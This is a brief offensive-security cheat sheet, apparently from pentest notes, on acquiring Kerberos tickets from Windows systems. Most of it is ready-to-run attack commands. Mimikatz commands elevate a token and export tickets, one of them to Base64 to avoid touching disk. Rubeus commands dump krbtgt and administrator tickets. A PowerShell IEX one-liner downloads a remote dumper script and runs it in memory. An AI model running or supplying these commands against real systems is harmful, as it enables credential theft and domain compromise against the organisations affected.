Ticket Aquisition
Requirements
Unprivileged
Can extract Kerberos tickets for the current user context
Privileged (Elevated)
Can extract all Kerberos tickets on the given system
Tools
PowerShellKerberos:
Tool Usage
Mimikatz
# Export to file methods
# Export tickets (Preferred Method (More Accurate))
Mimikatz.exe "token::elevate" "sekurlsa::tickets /export"
# Alternative Method
Mimikatz.exe "token::elevate" "kerberos::list /export"
# Export to Base64 without touching disk
Mimikatz.exe "token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"
Rubeus
# Dump All
.\Rubeus.exe dump /nowrap
# Dump Specified tickets that match a service
.\Rubeus.exe dump /service:krbtgt /nowrap
.\Rubeus.exe dump /service:HTTP /nowrap
# Dump tickets for specified users
.\Rubeus.exe dump /user:administrator /nowrap
# Both
.\Rubeus.exe dump /service:krbtgt /user:administrator /nowrap
PowerShellKerberos
# Load into memory and dump
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/main/dumper.ps1')
Ticket Injection
WIP
Last updated